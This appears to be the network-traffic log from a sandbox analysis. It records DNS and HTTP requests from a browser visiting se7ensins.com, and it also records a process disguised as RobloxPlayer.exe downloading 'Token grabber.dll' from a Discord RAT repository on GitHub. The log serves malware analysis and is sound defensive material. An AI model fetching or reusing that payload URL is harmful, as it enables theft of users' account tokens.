
ajax.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ajax.googleapis.com

IN AAAA

Response

ajax.googleapis.com

IN AAAA

2a00:1450:4009:822::200a
GET

https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js

firefox.exe

Remote address:

172.217.16.234:443

Request

GET /ajax/libs/jquery/3.5.1/jquery.min.js HTTP/2.0
host: ajax.googleapis.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
DNS

static.cloudflareinsights.com

firefox.exe

Remote address:

8.8.8.8:53

Request

static.cloudflareinsights.com

IN A

Response

static.cloudflareinsights.com

IN A

104.16.80.73

static.cloudflareinsights.com

IN A

104.16.79.73
GET

https://static.cloudflareinsights.com/beacon.min.js/vef91dfe02fce4ee0ad053f6de4f175db1715022073587

firefox.exe

Remote address:

104.16.80.73:443

Request

GET /beacon.min.js/vef91dfe02fce4ee0ad053f6de4f175db1715022073587 HTTP/2.0
host: static.cloudflareinsights.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
referer: https://www.se7ensins.com/
sec-fetch-dest: script
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:11 GMT
content-type: text/javascript;charset=UTF-8
access-control-allow-origin: *
cache-control: public, max-age=86400
etag: W/"2024.5.0"
last-modified: Mon, 06 May 2024 19:01:13 GMT
cross-origin-resource-policy: cross-origin
vary: Accept-Encoding
server: cloudflare
cf-ray: 889a345affcd385c-LHR
content-encoding: gzip
DNS

static.cloudflareinsights.com

firefox.exe

Remote address:

8.8.8.8:53

Request

static.cloudflareinsights.com

IN A

Response

static.cloudflareinsights.com

IN A

104.16.80.73

static.cloudflareinsights.com

IN A

104.16.79.73
DNS

a.pub.network

firefox.exe

Remote address:

8.8.8.8:53

Request

a.pub.network

IN A

Response

a.pub.network

IN A

104.18.20.206

a.pub.network

IN A

104.18.21.206
GET

https://a.pub.network/se7ensins-com/pubfig.min.js

firefox.exe

Remote address:

104.18.20.206:443

Request

GET /se7ensins-com/pubfig.min.js HTTP/2.0
host: a.pub.network
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:11 GMT
content-type: application/javascript
x-goog-generation: 1716468389796436
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 122877
x-goog-hash: crc32c=OZ0Hhw==
x-goog-hash: md5=yG/bwr4AltnjlQRWLDfJsA==
x-goog-storage-class: MULTI_REGIONAL
access-control-allow-origin: *
access-control-expose-headers: *
x-guploader-uploadid: ABPtcPpuGpMvEUNJ2G-6u93qh3VT9nzEAZUVOMUSTQWyLiU9qdLjgMGjAqFG45HOxnWt2SmzhY7V59xzIA
expires: Sun, 26 May 2024 02:36:11 GMT
cache-control: public, max-age=1800
last-modified: Thu, 23 May 2024 12:46:29 GMT
etag: W/"c86fdbc2be0096d9e39504562c37c9b0"
age: 106083
alt-svc: h3=":443"; ma=86400
cf-cache-status: HIT
vary: Accept-Encoding
strict-transport-security: max-age=31536000; includeSubDomains; preload
link: <https://d.pub.network/v2/sites/se7ensins-com/configs?env=PROD>; rel="preload"; as="fetch"; crossorigin="use-credentials", <https://optimise.net>; rel="preconnect", <https://api.floors.dev>; rel="preconnect"
server: cloudflare
cf-ray: 889a345b9a5b94a5-LHR
content-encoding: br
DNS

a.pub.network

firefox.exe

Remote address:

8.8.8.8:53

Request

a.pub.network

IN A

Response

a.pub.network

IN A

104.18.20.206

a.pub.network

IN A

104.18.21.206
DNS

static.cloudflareinsights.com

firefox.exe

Remote address:

8.8.8.8:53

Request

static.cloudflareinsights.com

IN AAAA

Response

static.cloudflareinsights.com

IN AAAA

2606:4700::6810:5049

static.cloudflareinsights.com

IN AAAA

2606:4700::6810:4f49
DNS

cmp.quantcast.com

firefox.exe

Remote address:

8.8.8.8:53

Request

cmp.quantcast.com

IN A

Response

cmp.quantcast.com

IN A

3.162.140.119

cmp.quantcast.com

IN A

3.162.140.96

cmp.quantcast.com

IN A

3.162.140.65

cmp.quantcast.com

IN A

3.162.140.93
DNS

a.pub.network

firefox.exe

Remote address:

8.8.8.8:53

Request

a.pub.network

IN AAAA

Response

a.pub.network

IN AAAA

2606:4700::6812:15ce

a.pub.network

IN AAAA

2606:4700::6812:14ce
DNS

cmp.quantcast.com

firefox.exe

Remote address:

8.8.8.8:53

Request

cmp.quantcast.com

IN A

Response

cmp.quantcast.com

IN A

3.162.140.119

cmp.quantcast.com

IN A

3.162.140.96

cmp.quantcast.com

IN A

3.162.140.65

cmp.quantcast.com

IN A

3.162.140.93
DNS

cmp.quantcast.com

firefox.exe

Remote address:

8.8.8.8:53

Request

cmp.quantcast.com

IN AAAA

Response
DNS

234.16.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

234.16.217.172.in-addr.arpa

IN PTR

Response

234.16.217.172.in-addr.arpa

IN PTR

mad08s04-in-f101e100net

234.16.217.172.in-addr.arpa

IN PTR

lhr48s28-in-f10�I
DNS

73.80.16.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

73.80.16.104.in-addr.arpa

IN PTR

Response
DNS

206.20.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.20.18.104.in-addr.arpa

IN PTR

Response
DNS

secure.quantserve.com

firefox.exe

Remote address:

8.8.8.8:53

Request

secure.quantserve.com

IN A

Response

secure.quantserve.com

IN CNAME

2kpixel.quantserve.com

2kpixel.quantserve.com

IN CNAME

global.px.quantserve.com

global.px.quantserve.com

IN A

91.228.74.244

global.px.quantserve.com

IN A

91.228.74.166

global.px.quantserve.com

IN A

91.228.74.200

global.px.quantserve.com

IN A

91.228.74.159
DNS

global.px.quantserve.com

firefox.exe

Remote address:

8.8.8.8:53

Request

global.px.quantserve.com

IN A

Response

global.px.quantserve.com

IN A

91.228.74.166

global.px.quantserve.com

IN A

91.228.74.159

global.px.quantserve.com

IN A

91.228.74.244

global.px.quantserve.com

IN A

91.228.74.200
DNS

d.pub.network

firefox.exe

Remote address:

8.8.8.8:53

Request

d.pub.network

IN A

Response

d.pub.network

IN A

34.160.152.31
GET

https://d.pub.network/v2/sites/se7ensins-com/configs?env=PROD

firefox.exe

Remote address:

34.160.152.31:443

Request

GET /v2/sites/se7ensins-com/configs?env=PROD HTTP/2.0
host: d.pub.network
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers
DNS

d.pub.network

firefox.exe

Remote address:

8.8.8.8:53

Request

d.pub.network

IN A

Response

d.pub.network

IN A

34.160.152.31
DNS

d.pub.network

firefox.exe

Remote address:

8.8.8.8:53

Request

d.pub.network

IN AAAA

Response
GET

https://cmp.quantcast.com/choice/4rCU9BwHgu6h5/www.se7ensins.com/choice.js?tag_version=V2

firefox.exe

Remote address:

3.162.140.119:443

Request

GET /choice/4rCU9BwHgu6h5/www.se7ensins.com/choice.js?tag_version=V2 HTTP/2.0
host: cmp.quantcast.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 301

content-length: 0
location: https://cmp.inmobi.com/choice/4rCU9BwHgu6h5/www.se7ensins.com/choice.js?tag_version=V2
cache-control: max-age=3600
date: Sun, 26 May 2024 02:06:14 GMT
last-modified: Wed, 15 Nov 2023 19:09:02 GMT
x-amz-server-side-encryption: AES256
x-amz-website-redirect-location: https://cmp.inmobi.com/choice/4rCU9BwHgu6h5/www.se7ensins.com/choice.js?tag_version=V2
accept-ranges: bytes
server: AmazonS3
cross-origin-resource-policy: cross-origin
etag: "8f20537c8168a9433e9d54c9bed09317"
vary: Access-Control-Request-Headers,Access-Control-Request-Method,Origin,Accept-Encoding
x-cache: Miss from cloudfront
via: 1.1 30b7c7ba62a58191e6dc0b2f231501a4.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P2
x-amz-cf-id: bOYu-S1o3XL6nYhMnQO5oZOVT_t1Llf9KlJ3DSQqjMZEsaFzGtHUVA==
DNS

raw.githubusercontent.com

RobloxPlayer.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.109.133

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.110.133
GET

https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll

RobloxPlayer.exe

Remote address:

185.199.109.133:443

Request

GET /moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 2901504
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "7aa094c7a5e7645371637e2935e65a95ac7ec8899b4f08b38009a9f1887128d9"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: E602:21C8B5:E879F:1296EA:66529910
Accept-Ranges: bytes
Date: Sun, 26 May 2024 02:06:13 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600070-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1716689173.304289,VS0,VE178
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 5dc08038893e912423dfe8ee50f7905f9e8f80aa
Expires: Sun, 26 May 2024 02:11:13 GMT
Source-Age: 0
DNS

31.152.160.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.152.160.34.in-addr.arpa

IN PTR

Response

31.152.160.34.in-addr.arpa

IN PTR

3115216034bcgoogleusercontentcom
DNS

119.140.162.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

119.140.162.3.in-addr.arpa

IN PTR

Response

119.140.162.3.in-addr.arpa

IN PTR

server-3-162-140-119dub56r cloudfrontnet
DNS

244.74.228.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

244.74.228.91.in-addr.arpa

IN PTR

Response
DNS

rules.quantcount.com

firefox.exe

Remote address:

8.8.8.8:53

Request

rules.quantcount.com

IN A

Response

rules.quantcount.com

IN CNAME

d2fashanjl7d9f.cloudfront.net

d2fashanjl7d9f.cloudfront.net

IN A

18.66.171.123

d2fashanjl7d9f.cloudfront.net

IN A

18.66.171.87

d2fashanjl7d9f.cloudfront.net

IN A

18.66.171.11

d2fashanjl7d9f.cloudfront.net

IN A

18.66.171.10
GET

https://rules.quantcount.com/rules-p-4rCU9BwHgu6h5.js

firefox.exe

Remote address:

18.66.171.123:443

Request

GET /rules-p-4rCU9BwHgu6h5.js HTTP/2.0
host: rules.quantcount.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

content-type: application/javascript
content-length: 160
last-modified: Fri, 14 Oct 2022 00:55:28 GMT
x-amz-server-side-encryption: AES256
accept-ranges: bytes
server: AmazonS3
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
access-control-allow-methods: GET
date: Sun, 26 May 2024 01:37:40 GMT
cache-control: max-age=3600
etag: "eda3cb6dd09d7c233f59a2b65aad7c51"
vary: Accept-Encoding
x-cache: Hit from cloudfront
via: 1.1 a2df4ad642d78d6dac65038e06ad10d2.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P1
x-amz-cf-id: b8spcPSh-zp5aPkjv1SgGot1T1gncYVwtica9ZNN-URwJRgtXOI5ew==
age: 1714
DNS

d2fashanjl7d9f.cloudfront.net

firefox.exe

Remote address:

8.8.8.8:53

Request

d2fashanjl7d9f.cloudfront.net

IN A

Response

d2fashanjl7d9f.cloudfront.net

IN A

18.66.171.123

d2fashanjl7d9f.cloudfront.net

IN A

18.66.171.10

d2fashanjl7d9f.cloudfront.net

IN A

18.66.171.87

d2fashanjl7d9f.cloudfront.net

IN A

18.66.171.11
DNS

cmp.inmobi.com

firefox.exe

Remote address:

8.8.8.8:53

Request

cmp.inmobi.com

IN A

Response

cmp.inmobi.com

IN CNAME

cmp-prod.inmobi-choice.io

cmp-prod.inmobi-choice.io

IN CNAME

d23sp3kzv1t6m5.cloudfront.net

d23sp3kzv1t6m5.cloudfront.net

IN A

18.66.171.20

d23sp3kzv1t6m5.cloudfront.net

IN A

18.66.171.48

d23sp3kzv1t6m5.cloudfront.net

IN A

18.66.171.103

d23sp3kzv1t6m5.cloudfront.net

IN A

18.66.171.49
DNS

d2fashanjl7d9f.cloudfront.net

firefox.exe

Remote address:

8.8.8.8:53

Request

d2fashanjl7d9f.cloudfront.net

IN AAAA

Response

d2fashanjl7d9f.cloudfront.net

IN AAAA

2600:9000:2245:800:6:44e3:f8c0:93a1

d2fashanjl7d9f.cloudfront.net

IN AAAA

2600:9000:2245:2400:6:44e3:f8c0:93a1

d2fashanjl7d9f.cloudfront.net

IN AAAA

2600:9000:2245:3c00:6:44e3:f8c0:93a1

d2fashanjl7d9f.cloudfront.net

IN AAAA

2600:9000:2245:d000:6:44e3:f8c0:93a1

d2fashanjl7d9f.cloudfront.net

IN AAAA

2600:9000:2245:1e00:6:44e3:f8c0:93a1

d2fashanjl7d9f.cloudfront.net

IN AAAA

2600:9000:2245:5800:6:44e3:f8c0:93a1

d2fashanjl7d9f.cloudfront.net

IN AAAA

2600:9000:2245:4400:6:44e3:f8c0:93a1

d2fashanjl7d9f.cloudfront.net

IN AAAA

2600:9000:2245:c200:6:44e3:f8c0:93a1
GET

https://cmp.inmobi.com/choice/4rCU9BwHgu6h5/www.se7ensins.com/choice.js?tag_version=V2

firefox.exe

Remote address:

18.66.171.20:443

Request

GET /choice/4rCU9BwHgu6h5/www.se7ensins.com/choice.js?tag_version=V2 HTTP/2.0
host: cmp.inmobi.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

content-type: application/javascript
last-modified: Wed, 15 Nov 2023 19:09:02 GMT
x-amz-server-side-encryption: AES256
server: AmazonS3
cross-origin-resource-policy: cross-origin
content-encoding: gzip
cache-control: max-age=900
date: Sun, 26 May 2024 02:06:14 GMT
etag: W/"06eaf895b5abd58580b7920d1455c10e"
vary: Access-Control-Request-Headers,Access-Control-Request-Method,Origin,Accept-Encoding
x-cache: RefreshHit from cloudfront
via: 1.1 7285dbd4c05f1133ea7048c8307b03ee.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P1
x-amz-cf-id: _IUHXvMAIiFd3A7y4PN4FSQ7iwZrorY-8aXqXdOjinV1ErJkGPE_mg==
GET

https://cmp.inmobi.com/tcfv2/cmp2.js?referer=www.se7ensins.com/

firefox.exe

Remote address:

18.66.171.20:443

Request

GET /tcfv2/cmp2.js?referer=www.se7ensins.com/ HTTP/2.0
host: cmp.inmobi.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

content-type: text/javascript;charset=UTF-8
access-control-max-age: 86400
last-modified: Tue, 21 May 2024 05:38:03 GMT
x-amz-storage-class: INTELLIGENT_TIERING
x-amz-server-side-encryption: AES256
x-amz-meta-qc-ineu: True
server: AmazonS3
access-control-allow-origin: *
access-control-allow-methods: GET
content-encoding: gzip
cache-control: max-age=3600
date: Sun, 26 May 2024 01:30:50 GMT
etag: W/"ed8dbcb37add9d6820b2aba407417cb2"
vary: Accept-Encoding
x-cache: Hit from cloudfront
via: 1.1 7285dbd4c05f1133ea7048c8307b03ee.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P1
x-amz-cf-id: Xt--jFfH6OBzQZWScfBltLXrHTj2xN2Sp7d5SQdSWcV_fz8CHULtiw==
age: 2124
GET

https://cmp.inmobi.com/geoip

firefox.exe

Remote address:

18.66.171.20:443

Request

GET /geoip HTTP/2.0
host: cmp.inmobi.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json, text/plain, */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
referer: https://www.se7ensins.com/
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

server: CloudFront
date: Sun, 26 May 2024 02:06:14 GMT
content-type: application/json
content-length: 48
x-cache: FunctionGeneratedResponse from cloudfront
via: 1.1 7285dbd4c05f1133ea7048c8307b03ee.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P1
x-amz-cf-id: ta4bUFhu7EP5F--lEHAHNtvcrocpcR4dz1bfe5CoJMguBZxw5caJeA==
access-control-allow-origin: *
access-control-expose-headers: *
GET

https://cmp.inmobi.com/GVL-v2/cmp-list.json

firefox.exe

Remote address:

18.66.171.20:443

Request

GET /GVL-v2/cmp-list.json HTTP/2.0
host: cmp.inmobi.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json, text/plain, */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
referer: https://www.se7ensins.com/
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

content-type: application/json
access-control-max-age: 3000
cache-control: max-age=172800
date: Sat, 25 May 2024 03:00:45 GMT
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-allow-credentials: true
last-modified: Sat, 25 May 2024 03:00:42 GMT
etag: W/"24a0ad86e045364c234bb45a464a9416"
x-amz-server-side-encryption: AES256
server: AmazonS3
content-encoding: br
vary: Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 7285dbd4c05f1133ea7048c8307b03ee.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P1
x-amz-cf-id: NrdFiguks4dBpWSMU7X4ou9_wkqsKz5bZ_Vm4qxiTzUVshw_9aRrXQ==
age: 83130
GET

https://cmp.inmobi.com/GVL-v2/vendor-list-trimmed-v1.json

firefox.exe

Remote address:

18.66.171.20:443

Request

GET /GVL-v2/vendor-list-trimmed-v1.json HTTP/2.0
host: cmp.inmobi.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
referer: https://www.se7ensins.com/
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

content-type: application/json
access-control-max-age: 3000
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-allow-credentials: true
last-modified: Thu, 23 May 2024 23:59:20 GMT
x-amz-server-side-encryption: AES256
server: AmazonS3
content-encoding: br
cache-control: max-age=86400
date: Sat, 25 May 2024 23:59:25 GMT
etag: W/"e2bcee663677e0a88f6ed90c9cd0c496"
vary: Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 7285dbd4c05f1133ea7048c8307b03ee.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P1
x-amz-cf-id: uQ4RPKhK9oXiE8FrVPa6c69TPt3pD0RNbLeu9TYmzjuQMP9CAhYYpw==
age: 7610
GET

https://cmp.inmobi.com/tcfv2/53/cmp2ui-en.js

firefox.exe

Remote address:

18.66.171.20:443

Request

GET /tcfv2/53/cmp2ui-en.js HTTP/2.0
host: cmp.inmobi.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

content-type: text/javascript;charset=UTF-8
access-control-max-age: 86400
last-modified: Tue, 21 May 2024 05:37:56 GMT
x-amz-server-side-encryption: AES256
server: AmazonS3
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
access-control-allow-methods: GET
content-encoding: br
cache-control: max-age=172800
date: Fri, 24 May 2024 06:51:30 GMT
etag: W/"b19d219c01b86c93182340e72ffe3bbc"
vary: Accept-Encoding
x-cache: Hit from cloudfront
via: 1.1 7285dbd4c05f1133ea7048c8307b03ee.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P1
x-amz-cf-id: XbaDirtGlybRZm7PoHV8UsoOFzx3sszaino4alf-SZuNnvzA0frlyg==
age: 155685
GET

https://cmp.inmobi.com/geoip

firefox.exe

Remote address:

18.66.171.20:443

Request

GET /geoip HTTP/2.0
host: cmp.inmobi.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json, text/plain, */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

server: CloudFront
date: Sun, 26 May 2024 02:06:15 GMT
content-type: application/json
content-length: 48
x-cache: FunctionGeneratedResponse from cloudfront
via: 1.1 7285dbd4c05f1133ea7048c8307b03ee.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P1
x-amz-cf-id: SssDWyd7DeRl-lf3TPK019zm89AoWLkzQeSU63lpRsiQfHIrKDsE4A==
access-control-allow-origin: *
access-control-expose-headers: *
DNS

d23sp3kzv1t6m5.cloudfront.net

firefox.exe

Remote address:

8.8.8.8:53

Request

d23sp3kzv1t6m5.cloudfront.net

IN A

Response

d23sp3kzv1t6m5.cloudfront.net

IN A

18.66.171.103

d23sp3kzv1t6m5.cloudfront.net

IN A

18.66.171.48

d23sp3kzv1t6m5.cloudfront.net

IN A

18.66.171.49

d23sp3kzv1t6m5.cloudfront.net

IN A

18.66.171.20
DNS

d23sp3kzv1t6m5.cloudfront.net

firefox.exe

Remote address:

8.8.8.8:53

Request

d23sp3kzv1t6m5.cloudfront.net

IN AAAA

Response

d23sp3kzv1t6m5.cloudfront.net

IN AAAA

2600:9000:2245:ee00:1b:cadc:ef40:93a1

d23sp3kzv1t6m5.cloudfront.net

IN AAAA

2600:9000:2245:7a00:1b:cadc:ef40:93a1

d23sp3kzv1t6m5.cloudfront.net

IN AAAA

2600:9000:2245:5800:1b:cadc:ef40:93a1

d23sp3kzv1t6m5.cloudfront.net

IN AAAA

2600:9000:2245:9000:1b:cadc:ef40:93a1

d23sp3kzv1t6m5.cloudfront.net

IN AAAA

2600:9000:2245:2600:1b:cadc:ef40:93a1

d23sp3kzv1t6m5.cloudfront.net

IN AAAA

2600:9000:2245:ce00:1b:cadc:ef40:93a1

d23sp3kzv1t6m5.cloudfront.net

IN AAAA

2600:9000:2245:ae00:1b:cadc:ef40:93a1

d23sp3kzv1t6m5.cloudfront.net

IN AAAA

2600:9000:2245:ac00:1b:cadc:ef40:93a1
DNS

133.109.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.109.199.185.in-addr.arpa

IN PTR

Response

133.109.199.185.in-addr.arpa

IN PTR

cdn-185-199-109-133githubcom
DNS

123.171.66.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

123.171.66.18.in-addr.arpa

IN PTR

Response

123.171.66.18.in-addr.arpa

IN PTR

server-18-66-171-123dub56r cloudfrontnet
DNS

20.171.66.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

20.171.66.18.in-addr.arpa

IN PTR

Response

20.171.66.18.in-addr.arpa

IN PTR

server-18-66-171-20dub56r cloudfrontnet
DNS

14.213.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.213.58.216.in-addr.arpa

IN PTR

Response

14.213.58.216.in-addr.arpa

IN PTR

ber01s14-in-f141e100net

14.213.58.216.in-addr.arpa

IN PTR

lhr25s25-in-f14�H
DNS

optimise.net

firefox.exe

Remote address:

8.8.8.8:53

Request

optimise.net

IN A

Response

optimise.net

IN A

34.111.152.239
DNS

optimise.net

firefox.exe

Remote address:

8.8.8.8:53

Request

optimise.net

IN A

Response

optimise.net

IN A

34.111.152.239
DNS

optimise.net

firefox.exe

Remote address:

8.8.8.8:53

Request

optimise.net

IN AAAA

Response
DNS

api.cmp.inmobi.com

firefox.exe

Remote address:

8.8.8.8:53

Request

api.cmp.inmobi.com

IN A

Response

api.cmp.inmobi.com

IN CNAME

cmp-api-prod.inmobi-choice.io

cmp-api-prod.inmobi-choice.io

IN CNAME

choice-apis-prod-2120274730.eu-central-1.elb.amazonaws.com

choice-apis-prod-2120274730.eu-central-1.elb.amazonaws.com

IN A

3.120.230.251

choice-apis-prod-2120274730.eu-central-1.elb.amazonaws.com

IN A

3.75.28.93

choice-apis-prod-2120274730.eu-central-1.elb.amazonaws.com

IN A

35.156.23.70
DNS

choice-apis-prod-2120274730.eu-central-1.elb.amazonaws.com

firefox.exe

Remote address:

8.8.8.8:53

Request

choice-apis-prod-2120274730.eu-central-1.elb.amazonaws.com

IN A

Response

choice-apis-prod-2120274730.eu-central-1.elb.amazonaws.com

IN A

3.120.230.251

choice-apis-prod-2120274730.eu-central-1.elb.amazonaws.com

IN A

35.156.23.70

choice-apis-prod-2120274730.eu-central-1.elb.amazonaws.com

IN A

3.75.28.93
GET

https://optimise.net/?k=0&d=se7ensins.com&t=desktop

firefox.exe

Remote address:

34.111.152.239:443

Request

GET /?k=0&d=se7ensins.com&t=desktop HTTP/2.0
host: optimise.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
x-api-key: 4e799501-b8b6-4ef1-bad5-225b3dd1aa8d
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers
DNS

choice-apis-prod-2120274730.eu-central-1.elb.amazonaws.com

firefox.exe

Remote address:

8.8.8.8:53

Request

choice-apis-prod-2120274730.eu-central-1.elb.amazonaws.com

IN AAAA

Response
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

239.152.111.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

239.152.111.34.in-addr.arpa

IN PTR

Response

239.152.111.34.in-addr.arpa

IN PTR

23915211134bcgoogleusercontentcom
GET

https://api.cmp.inmobi.com/?log=%7B%22accountId%22%3A%224rCU9BwHgu6h5%22%2C%22domain%22%3A%22www.se7ensins.com%22%2C%22publisher%22%3A%22Se7enSins%22%2C%22cmpId%22%3A10%2C%22cmpVersion%22%3A%222.53%22%2C%22displayType%22%3A%22tcfui%3Amandatory%22%2C%22configurationHashCode%22%3A%22UuhOy8%2B9eY8AWn3z6h8Evg%22%2C%22tagVersion%22%3A%22V2%22%2C%22gvlVersion%22%3A2%2C%22clientTimestamp%22%3A1716689173228%2C%22operationType%22%3A%22init%22%2C%22sessionId%22%3A%22GDPR-dr6v5hxjvgca2i21gkwd%22%7D

firefox.exe

Remote address:

3.120.230.251:443

Request

